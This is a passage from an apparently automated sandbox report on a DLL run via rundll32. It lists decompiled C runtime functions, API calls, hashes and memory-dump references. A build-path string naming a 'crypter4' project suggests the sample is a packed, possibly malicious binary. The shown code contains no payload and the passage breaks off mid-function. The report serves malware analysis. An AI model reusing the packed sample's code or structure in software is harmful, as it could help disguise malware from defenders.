								goto L13;
							} else {
								_t13 = 0;
								E6EE44DA2(__eflags,  *0x6ee77be0, 0);
								_push(_t18);
								goto L9;
							}
						} else {
							_t13 = 0;
							__eflags = 0;
							E6EE44DA2(0,  *0x6ee77be0, 0);
							_push(0);
							L9:
							E6EE4471C();
							goto L4;
						}
					}
				} else {
					_t18 = E6EE44D63(_t24, _t2);
					if(_t18 == 0) {
						_t2 =  *0x6ee77be0; // 0x7
						goto L6;
					} else {
						if(_t18 != 0xffffffff) {
							L13:
							_t13 = _t18;
						} else {
							L3:
							_t13 = 0;
							L4:
							_t18 = _t13;
						}
					}
				}
				SetLastError(_t21);
				asm("sbb edi, edi");
				return  ~_t18 & _t13;
			}

0x6ee4462c
0x6ee4462e
0x6ee44633
0x6ee44636
0x6ee44654
0x6ee44657
0x6ee4465c
0x6ee4465e
0x00000000
0x6ee44660
0x6ee4466c
0x6ee44670
0x6ee44672
0x6ee44697
0x6ee44699
0x6ee446b2
0x6ee446b9
0x00000000
0x6ee4469b
0x6ee4469b
0x6ee446a4
0x6ee446a9
0x00000000
0x6ee446a9
0x6ee44674
0x6ee44674
0x6ee44674
0x6ee4467d
0x6ee44682
0x6ee44683
0x6ee44683
0x00000000
0x6ee44688
0x6ee44672
0x6ee44638
0x6ee4463e
0x6ee44642
0x6ee4464f
0x00000000
0x6ee44644
0x6ee44647
0x6ee446c1
0x6ee446c1
0x6ee44649
0x6ee44649
0x6ee44649
0x6ee4464b
0x6ee4464b
0x6ee4464b
0x6ee44647
0x6ee44642
0x6ee446c4
0x6ee446cc
0x6ee446d5

APIs

GetLastError.KERNEL32(?,00000000,?,6EE42017,6EE44799,?,?,6EE3612D,00000000,?,6EDB211C,00000000,?,6EDB1379,00000000), ref: 6EE44626
_free.LIBCMT ref: 6EE44683
_free.LIBCMT ref: 6EE446B9
SetLastError.KERNEL32(00000000,00000007,000000FF,?,00000000,?,6EE42017,6EE44799,?,?,6EE3612D,00000000,?,6EDB211C,00000000), ref: 6EE446C4

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 8669830b9ce7df3514c211a8d381c6baeb29b2d7fd3120a488a61794397f7e44
Instruction ID: a35d3de6afbd846d8583ab1e3e2cca1529a44bddc18ac96b276b897b2bb4ae78
Opcode Fuzzy Hash: 8669830b9ce7df3514c211a8d381c6baeb29b2d7fd3120a488a61794397f7e44
Instruction Fuzzy Hash: 39118A35314512EEDF415DFABC94E562AAE9BC26BDB35076BF524923D0DFB18C078110

Uniqueness

Uniqueness Score: -1.00%

Function 6EE5508F, Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EE5508F(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x6ee784b0, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E6EE55078();
					E6EE5503A();
					_t13 = WriteConsoleW( *0x6ee784b0, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}

0x6ee550ac
0x6ee550b0
0x6ee550bd
0x6ee550c2
0x6ee550dd
0x6ee550dd
0x6ee550e3

APIs

WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,6EE53948,00000000,00000001,00000000,00000000,?,6EE4A5DF,?,?,00000000), ref: 6EE550A6
GetLastError.KERNEL32(?,6EE53948,00000000,00000001,00000000,00000000,?,6EE4A5DF,?,?,00000000,?,00000000,?,6EE4AB2B,?), ref: 6EE550B2

Part of subcall function 6EE55078: CloseHandle.KERNEL32(FFFFFFFE,6EE550C2,?,6EE53948,00000000,00000001,00000000,00000000,?,6EE4A5DF,?,?,00000000,?,00000000), ref: 6EE55088

___initconout.LIBCMT ref: 6EE550C2

Part of subcall function 6EE5503A: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6EE55069,6EE53935,00000000,?,6EE4A5DF,?,?,00000000,?), ref: 6EE5504D

WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,6EE53948,00000000,00000001,00000000,00000000,?,6EE4A5DF,?,?,00000000,?), ref: 6EE550D7

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 24b38fc72cb5a5929e30c35b57df7a82f7a45a39d48ebfd5f4ecfde9c9de0b63
Instruction ID: 1335593b022fca43c4c0663502122115313b7d38b853c76e85ddd61f82df22de
Opcode Fuzzy Hash: 24b38fc72cb5a5929e30c35b57df7a82f7a45a39d48ebfd5f4ecfde9c9de0b63
Instruction Fuzzy Hash: 36F01536010668BBCF621FD5CC0898A3F66FB0A3A5F208014FA1A95228D7738930DBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6EE4DDBE, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E6EE4DDBE(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __fp0, char _a4) {
				signed int _v8;
				char _v264;
				char _v520;
				char _v776;
				char _v1800;
				char _v1814;
				struct _cpinfo _v1820;
				signed int _t60;
				char _t63;
				char _t68;
				signed char _t69;
				signed int _t70;
				signed int _t80;
				char _t85;
				signed int _t88;
				signed char _t89;
				char _t90;
				signed int _t91;
				void* _t92;
				intOrPtr _t98;
				signed int _t101;
				signed int _t103;
				void* _t116;

				_t116 = __fp0;
				_t91 = __edx;
				_t101 = _t103;
				_t60 =  *0x6ee77a68; // 0xbfafeb97
				_v8 = _t60 ^ _t101;
				_t2 =  &_a4; // 0x6ee4e1e3
				_t98 =  *_t2;
				if( *(_t98 + 4) == 0xfde9 || GetCPInfo( *(_t98 + 4),  &_v1820) == 0) {
					__eflags = 0;
					_t85 = 0;
					do {
						_t46 = _t85 - 0x61; // -97
						_t92 = _t46;
						_t47 = _t92 + 0x20; // -65
						__eflags = _t47 - 0x19;
						if(_t47 > 0x19) {
							__eflags = _t92 - 0x19;
							if(_t92 > 0x19) {
								_t63 = 0;
							} else {
								 *(_t98 + _t85 + 0x19) =  *(_t98 + _t85 + 0x19) | 0x00000020;
								_t56 = _t85 - 0x20; // -32
								_t63 = _t56;
							}
						} else {
							 *(_t98 + _t85 + 0x19) =  *(_t98 + _t85 + 0x19) | 0x00000010;
							_t52 = _t85 + 0x20; // 0x20
							_t63 = _t52;
						}
						 *((char*)(_t98 + _t85 + 0x119)) = _t63;
						_t85 = _t85 + 1;
						__eflags = _t85 - 0x100;
					} while (_t85 < 0x100);
					goto L27;
				} else {
					_t68 = 0;
					do {
						 *((char*)(_t101 + _t68 - 0x104)) = _t68;
						_t68 = _t68 + 1;
					} while (_t68 < 0x100);
					_t69 = _v1814;
					_t88 =  &_v1814;
					_v264 = 0x20;
					while(1) {
						_t112 = _t69;
						if(_t69 == 0) {
							break;
						}
						_t91 =  *(_t88 + 1) & 0x000000ff;
						_t70 = _t69 & 0x000000ff;
						while(1) {
							__eflags = _t70 - _t91;
							if(_t70 > _t91) {
								break;
							}
							__eflags = _t70 - 0x100;
							if(_t70 >= 0x100) {
								break;
							}
							 *((char*)(_t101 + _t70 - 0x104)) = 0x20;
							_t70 = _t70 + 1;
							__eflags = _t70;
						}
						_t88 = _t88 + 2;
						__eflags = _t88;
						_t69 =  *_t88;
					}
					E6EE4C37D(0, _t91, 0x100, _t98, _t112, _t116, 0, 1,  &_v264, 0x100,  &_v1800,  *(_t98 + 4), 0);
					E6EE4C66A(0, 0x100, _t98, _t112, _t116, 0,  *((intOrPtr*)(_t98 + 0x21c)), 0x100,  &_v264, 0x100,  &_v520, 0x100,  *(_t98 + 4), 0);
					E6EE4C66A(0, 0x100, _t98, _t112, _t116, 0,  *((intOrPtr*)(_t98 + 0x21c)), 0x200,  &_v264, 0x100,  &_v776, 0x100,  *(_t98 + 4), 0);
					_t80 = 0;
					do {
						_t89 =  *(_t101 + _t80 * 2 - 0x704) & 0x0000ffff;
						if((_t89 & 0x00000001) == 0) {
							__eflags = _t89 & 0x00000002;
							if((_t89 & 0x00000002) == 0) {
								_t90 = 0;
							} else {
								 *(_t98 + _t80 + 0x19) =  *(_t98 + _t80 + 0x19) | 0x00000020;
								_t90 =  *((intOrPtr*)(_t101 + _t80 - 0x304));
							}
						} else {
							 *(_t98 + _t80 + 0x19) =  *(_t98 + _t80 + 0x19) | 0x00000010;
							_t90 =  *((intOrPtr*)(_t101 + _t80 - 0x204));
						}
						 *((char*)(_t98 + _t80 + 0x119)) = _t90;
						_t80 = _t80 + 1;
					} while (_t80 < 0x100);
					L27:
					return E6EE361A7(_v8 ^ _t101);
				}
			}

0x6ee4ddbe
0x6ee4ddbe
0x6ee4ddc1
0x6ee4ddc9
0x6ee4ddd0
0x6ee4ddd5
0x6ee4ddd5
0x6ee4dde0
0x6ee4def2
0x6ee4def9
0x6ee4defb
0x6ee4defb
0x6ee4defb
0x6ee4defe
0x6ee4df01
0x6ee4df04
0x6ee4df10
0x6ee4df13
0x6ee4df21
0x6ee4df15
0x6ee4df18
0x6ee4df1c
0x6ee4df1c
0x6ee4df1c
0x6ee4df06
0x6ee4df06
0x6ee4df0b
0x6ee4df0b
0x6ee4df0b
0x6ee4df23
0x6ee4df2a
0x6ee4df2b
0x6ee4df2b
0x00000000
0x6ee4ddfe
0x6ee4de05
0x6ee4de07
0x6ee4de07
0x6ee4de0e
0x6ee4de0f
0x6ee4de13
0x6ee4de19
0x6ee4de1f
0x6ee4de47
0x6ee4de47
0x6ee4de49
0x00000000
0x00000000
0x6ee4de28
0x6ee4de2c
0x6ee4de3e
0x6ee4de3e
0x6ee4de40
0x00000000
0x00000000
0x6ee4de31
0x6ee4de33
0x00000000
0x00000000
0x6ee4de35
0x6ee4de3d
0x6ee4de3d
0x6ee4de3d
0x6ee4de42
0x6ee4de42
0x6ee4de45
0x6ee4de45
0x6ee4de61
0x6ee4de82
0x6ee4deaa
0x6ee4deb2
0x6ee4deb4
0x6ee4deb4
0x6ee4debf
0x6ee4decf
0x6ee4ded2
0x6ee4dee2
0x6ee4ded4
0x6ee4ded4
0x6ee4ded9
0x6ee4ded9
0x6ee4dec1
0x6ee4dec1
0x6ee4dec6
0x6ee4dec6
0x6ee4dee4
0x6ee4deeb
0x6ee4deec
0x6ee4df2f
0x6ee4df3d
0x6ee4df3d

APIs

GetCPInfo.KERNEL32(0000FDE9,?,?,?,00000000), ref: 6EE4DDF0

Strings

, xrefs: 6EE4DE35
n, xrefs: 6EE4DDD5

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: Info
String ID: $n
API String ID: 1807457897-70956054
Opcode ID: 954e55f1969a6d451da33416478b1f083e823396df6823cbee93811ca5efda0b
Instruction ID: db7df119ad3557821f3acfb87025578ea0f05728c5b4bf1f7e2c60c626eed3fb
Opcode Fuzzy Hash: 954e55f1969a6d451da33416478b1f083e823396df6823cbee93811ca5efda0b
Instruction Fuzzy Hash: 3E4149B5A04258DEEB218AD8D894BE67BFDEB55708F3004ADE58A87142D231AA45CF10

Uniqueness

Uniqueness Score: -1.00%

Function 6EE4C37D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E6EE4C37D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0, intOrPtr _a4, int _a8, intOrPtr _a12, intOrPtr _a16, short* _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				char _v20;
				intOrPtr _v28;
				char _v32;
				void* _v44;
				signed int _t30;
				signed int _t36;
				signed int _t40;
				int _t43;
				intOrPtr _t56;
				int _t58;
				short* _t60;
				signed int _t61;
				void* _t62;
				short* _t63;

				_t30 =  *0x6ee77a68; // 0xbfafeb97
				_v8 = _t30 ^ _t61;
				E6EE3B82D( &_v32, __edx, __fp0, _a4);
				_t48 = _a24;
				if(_a24 == 0) {
					_t48 =  *((intOrPtr*)(_v28 + 8));
				}
				_t58 = 0;
				_t36 = E6EE4D1B6(_t48, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_t63 = _t62 + 0x18;
				_v16 = _t36;
				if(_t36 == 0) {
					L16:
					if(_v20 != 0) {
						 *(_v32 + 0x350) =  *(_v32 + 0x350) & 0xfffffffd;
					}
					return E6EE361A7(_v8 ^ _t61);
				} else {
					_t56 = _t36 + _t36;
					_v12 = _t56;
					asm("sbb eax, eax");
					_t40 = _t36 & _t56 + 0x00000008;
					if(_t40 == 0) {
						_t60 = 0;
						L12:
						if(_t60 != 0) {
							E6EE38EC0(_t58, _t60, _t58, _t56);
							_t43 = E6EE4D1B6(_t48, 1, _a12, _a16, _t60, _v16);
							if(_t43 != 0) {
								_t58 = GetStringTypeW(_a8, _t60, _t43, _a20);
							}
						}
						E6EE35FB5(_t60);
						goto L16;
					}
					if(_t40 > 0x400) {
						_t60 = E6EE44756(_t40);
						if(_t60 == 0) {
							L10:
							_t56 = _v12;
							goto L12;
						}
						 *_t60 = 0xdddd;
						L9:
						_t60 =  &(_t60[4]);
						goto L10;
					}
					E6EE37060();
					_t60 = _t63;
					if(_t60 == 0) {
						goto L10;
					}
					 *_t60 = 0xcccc;
					goto L9;
				}
			}

0x6ee4c385
0x6ee4c38c
0x6ee4c398
0x6ee4c39d
0x6ee4c3a2
0x6ee4c3a7
0x6ee4c3a7
0x6ee4c3ac
0x6ee4c3c5
0x6ee4c3ca
0x6ee4c3cd
0x6ee4c3d2
0x6ee4c45c
0x6ee4c460
0x6ee4c465
0x6ee4c465
0x6ee4c47f
0x6ee4c3d8
0x6ee4c3d8
0x6ee4c3de
0x6ee4c3e3
0x6ee4c3e5
0x6ee4c3e7
0x6ee4c41e
0x6ee4c420
0x6ee4c422
0x6ee4c427
0x6ee4c439
0x6ee4c443
0x6ee4c453
0x6ee4c453
0x6ee4c443
0x6ee4c456
0x00000000
0x6ee4c45b
0x6ee4c3ee
0x6ee4c409
0x6ee4c40e
0x6ee4c419
0x6ee4c419
0x00000000
0x6ee4c419
0x6ee4c410
0x6ee4c416
0x6ee4c416
0x00000000
0x6ee4c416
0x6ee4c3f0
0x6ee4c3f5
0x6ee4c3f9
0x00000000
0x00000000
0x6ee4c3fb
0x00000000
0x6ee4c3fb

APIs

GetStringTypeW.KERNEL32(?,00000000,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,0000FDE9), ref: 6EE4C44D
__freea.LIBCMT ref: 6EE4C456

Part of subcall function 6EE44756: RtlAllocateHeap.NTDLL(00000000,00000000,?,?,6EE3612D,00000000,?,6EDB211C,00000000,?,6EDB1379,00000000), ref: 6EE44788

Strings

n, xrefs: 6EE4C390

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeapStringType__freea
String ID: n
API String ID: 4073780324-2987474338
Opcode ID: 3aad2d5cc974105aabbb848f07a57a27a562d48345cce796bef0df11ccc02c82
Instruction ID: f78c1d9bb0c64eb304836248e81153680467f79674ca7f5d1dc7127295c38e20
Opcode Fuzzy Hash: 3aad2d5cc974105aabbb848f07a57a27a562d48345cce796bef0df11ccc02c82
Instruction Fuzzy Hash: 6631CF72A1021AEBEB108FE5EC44EFF7BB8EF44358F204528E8149B240DB349955CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6EE40C41, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49
memoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E6EE40C41(long _a4) {
				void* _t4;
				void* _t13;
				long _t16;

				_pop(_t18);
				_t13 = _a4;
				if(_t13 != 0) {
					_t16 = _a4;
					__eflags = _t16;
					if(_t16 != 0) {
						__eflags = _t16 - 0xffffffe0;
						if(__eflags <= 0) {
							while(1) {
								_t4 = HeapReAlloc( *0x6ee796a4, 0, _t13, _t16);
								__eflags = _t4;
								if(_t4 != 0) {
									break;
								}
								__eflags = E6EE4ECA6();
								if(__eflags == 0) {
									goto L6;
								} else {
									__eflags = E6EE42BF8(__eflags, _t16);
									if(__eflags == 0) {
										goto L6;
									} else {
										continue;
									}
								}
								L14:
							}
						} else {
							L6:
							 *((intOrPtr*)(E6EE42012(__eflags))) = 0xc;
							goto L7;
						}
					} else {
						E6EE4471C(_t13);
						L7:
						_t4 = 0;
						__eflags = 0;
					}
				} else {
					_t4 = E6EE44756(_a4);
				}
				return _t4;
				goto L14;
			}

0x6ee40c46
0x6ee4ac55
0x6ee4ac5a
0x6ee4ac68
0x6ee4ac6b
0x6ee4ac6d
0x6ee4ac78
0x6ee4ac7b
0x6ee4aca2
0x6ee4acac
0x6ee4acb2
0x6ee4acb4
0x00000000
0x00000000
0x6ee4ac93
0x6ee4ac95
0x00000000
0x6ee4ac97
0x6ee4ac9e
0x6ee4aca0
0x00000000
0x00000000
0x00000000
0x00000000
0x6ee4aca0
0x00000000
0x6ee4ac95
0x6ee4ac7d
0x6ee4ac7d
0x6ee4ac82
0x00000000
0x6ee4ac82
0x6ee4ac6f
0x6ee4ac70
0x6ee4ac88
0x6ee4ac88
0x6ee4ac88
0x6ee4ac88
0x6ee4ac5c
0x6ee4ac5f
0x6ee4ac64
0x6ee4ac8d
0x00000000

APIs

_free.LIBCMT ref: 6EE4AC70

Part of subcall function 6EE44756: RtlAllocateHeap.NTDLL(00000000,00000000,?,?,6EE3612D,00000000,?,6EDB211C,00000000,?,6EDB1379,00000000), ref: 6EE44788

HeapReAlloc.KERNEL32(00000000,?,00000000,Created by OpenJPEG version ,00000000,?,6EE2058A,?,00000000), ref: 6EE4ACAC

Strings

Created by OpenJPEG version , xrefs: 6EE4AC67

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocAllocate_free
String ID: Created by OpenJPEG version
API String ID: 2447670028-2177341080
Opcode ID: d0f9072d0a6a372c6bcc5bddc49832163be7b7f70c18903b00e182d15246fc47
Instruction ID: c43da1e80487a42fbe7780d8ce6f7404c24f81e6433fc18101da61b44014d53a
Opcode Fuzzy Hash: d0f9072d0a6a372c6bcc5bddc49832163be7b7f70c18903b00e182d15246fc47
Instruction Fuzzy Hash: 6DF0F4326D4116EB9B911AEA7C04FAB375D9FD36B5F32053EE81C9B290FF21D40281A0

Uniqueness

Uniqueness Score: -1.00%

Function 6EDCB200, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E6EDCB200(void* __eflags, intOrPtr _a4) {
				char _v8;
				intOrPtr _v16;
				char _v40;
				char _v64;
				void* _t21;
				intOrPtr _t36;
				void* _t37;

				_push(0xffffffff);
				_push(E6EE56155);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t36;
				_t37 = _t36 - 0x30;
				E6EDB18A0( &_v40, __eflags, 0x6ee572d8);
				_v8 = 0;
				_t40 = _a4 - 0x20;
				if(_a4 != 0x20) {
					E6EDB12B0(_t40,  &_v64,  &_v40, 0x6ee572dc);
					_t37 = _t37 + 0xc;
					_v8 = 1;
					E6EE3AAA4(1);
					E6EDB1FB0( &_v40,  &_v64);
					_v8 = 0;
					E6EDB1D80( &_v64);
				}
				E6EDB30F0( &_v40);
				_push(E6EDB2660( &_v40));
				E6EDB1340(_t19);
				_v8 = 0xffffffff;
				_t21 = E6EDB1D80( &_v40);
				 *[fs:0x0] = _v16;
				return _t21;
			}

0x6edcb203
0x6edcb205
0x6edcb210
0x6edcb211
0x6edcb218
0x6edcb223
0x6edcb228
0x6edcb22f
0x6edcb233
0x6edcb242
0x6edcb247
0x6edcb24a
0x6edcb250
0x6edcb25c
0x6edcb261
0x6edcb268
0x6edcb268
0x6edcb270
0x6edcb27d
0x6edcb27e
0x6edcb286
0x6edcb290
0x6edcb298
0x6edcb2a2

APIs

task.LIBCPMTD ref: 6EDCB268
task.LIBCPMTD ref: 6EDCB290

Strings

, xrefs: 6EDCB22F

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: task
String ID:
API String ID: 1384045349-3916222277
Opcode ID: 8c57adf827b541a399ac669332ee14cd188a99c4e4d4a82a6b59f1a752ce88b8
Instruction ID: 68406d25010fce473fac7954f5e602aeae1954729de0bdae9e6686805fe01184
Opcode Fuzzy Hash: 8c57adf827b541a399ac669332ee14cd188a99c4e4d4a82a6b59f1a752ce88b8
Instruction Fuzzy Hash: 88115EB6C10148ABCB04DBD4DA41BDDB7B8AF14648F204AA8E416672D0EB756A08C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 6EDDEF50, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E6EDDEF50(void* __ebx, void* __edx, void* __edi, void* __fp0, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				void* _t14;
				void* _t16;

				_t14 = __edx;
				_t20 = _a8;
				if(_a8 == 0) {
					_push(0xa2);
					E6EE3EEBE(__ebx, __edx, __edi, _t16, _t20, __fp0, "b", L"Z:\\cr\\crypter4\\ballast\\3\\openjp2\\opj_intmath.h");
				}
				asm("cdq");
				asm("cdq");
				asm("adc esi, edx");
				asm("sbb esi, 0x0");
				asm("cdq");
				return E6EE36450(_a4 + _a8 - 1, _t14, _a8, _t14);
			}

0x6eddef50
0x6eddef54
0x6eddef58
0x6eddef5a
0x6eddef69
0x6eddef6e
0x6eddef74
0x6eddef7c
0x6eddef7f
0x6eddef84
0x6eddef8a
0x6eddef96

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6EDDEF8F

Strings

Created by OpenJPEG version , xrefs: 6EDDEF53
Z:\cr\crypter4\ballast\3\openjp2\opj_intmath.h, xrefs: 6EDDEF5F

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: Created by OpenJPEG version $Z:\cr\crypter4\ballast\3\openjp2\opj_intmath.h
API String ID: 885266447-1835207418
Opcode ID: 4c6022794ce31d199e422de2ac05e30e9b900a4c71749524282ce387323ad930
Instruction ID: 71695c5c6e39c99068475d6120310346a6e423970a8f6a99b56a7ba81416d0ce
Opcode Fuzzy Hash: 4c6022794ce31d199e422de2ac05e30e9b900a4c71749524282ce387323ad930
Instruction Fuzzy Hash: 59E09271A40128BBCB049AADC805FA937AD9B44638F10C134F91C9A250D232DD4446A0

Uniqueness

Uniqueness Score: -1.00%

Function 6EDCC030, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E6EDCC030(intOrPtr __ecx, char _a4) {
				intOrPtr _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _t18;

				_push(0xffffffff);
				_push(E6EE5619D);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t18;
				_push(__ecx);
				_v20 = __ecx;
				_t2 =  &_a4; // 0x6ee572e0
				E6EDB3590(_v20,  *_t2);
				_v8 = 0;
				E6EDCC7A0(_v20);
				_v8 = 0xffffffff;
				 *[fs:0x0] = _v16;
				return _v20;
			}

0x6edcc033
0x6edcc035
0x6edcc040
0x6edcc041
0x6edcc048
0x6edcc049
0x6edcc04c
0x6edcc053
0x6edcc058
0x6edcc062
0x6edcc067
0x6edcc074
0x6edcc07e

APIs

Concurrency::details::SweeperContext::SweeperContext.LIBCMTD ref: 6EDCC053

Part of subcall function 6EDCC7A0: allocator.LIBCONCRTD ref: 6EDCC7B8

Strings

rn, xrefs: 6EDCC04C, 6EDCC04F
rn, xrefs: 6EDCC040

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: Sweeper$Concurrency::details::ContextContext::allocator
String ID: rn$rn
API String ID: 1818788282-2305765957
Opcode ID: d1be60d134a0d44291524747f492873c484c6b68b9842e8989826ccaec3b8641
Instruction ID: 4e22e256934dc2d351712dcd513e2d7134192422dfaf1074a6449bc819099e6c
Opcode Fuzzy Hash: d1be60d134a0d44291524747f492873c484c6b68b9842e8989826ccaec3b8641
Instruction Fuzzy Hash: FBF039B1904649EBCB14CF88CD44BAEB7B8FB08760F104B29F425977C0C7356900CBA0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 1320 Parent PID: 2964 rundll32.exeCOMMON

Executed Functions

Function 6EDCE310, Relevance: 54.3, APIs: 36, Instructions: 285
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E6EDCE310(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				intOrPtr _v16;
				intOrPtr* _v20;
				char* _v24;
				char* _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				char _v68;
				intOrPtr _v72;
				char* _v76;
				char _v80;
				char _v104;
				char _v128;
				char _v152;
				char _v176;
				char _v200;
				char _v224;
				char _v248;
				char _v292;
				char _v316;
				char _v340;
				char _v364;
				intOrPtr _t169;
				intOrPtr _t187;
				intOrPtr _t198;
				intOrPtr _t202;
				void* _t228;
				void* _t304;
				void* _t305;
				intOrPtr _t306;
				void* _t309;
				void* _t314;
				void* _t317;

				_t305 = __esi;
				_t304 = __edi;
				_t228 = __ebx;
				_push(0xffffffff);
				_push(0x6ee56378);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t306;
				_v20 = __ecx;
				E6EDB18A0( &_v104, __eflags, 0x6ee572e4);
				_v8 = 0;
				E6EDB18A0( &_v200, __eflags, 0x6ee572e8);
				_v8 = 1;
				E6EDB12B0(__eflags,  &_v152,  &_v200, 0x6ee572ec);
				_v8 = 2;
				E6EDB30F0( &_v152);
				_push(E6EDB2660( &_v152));
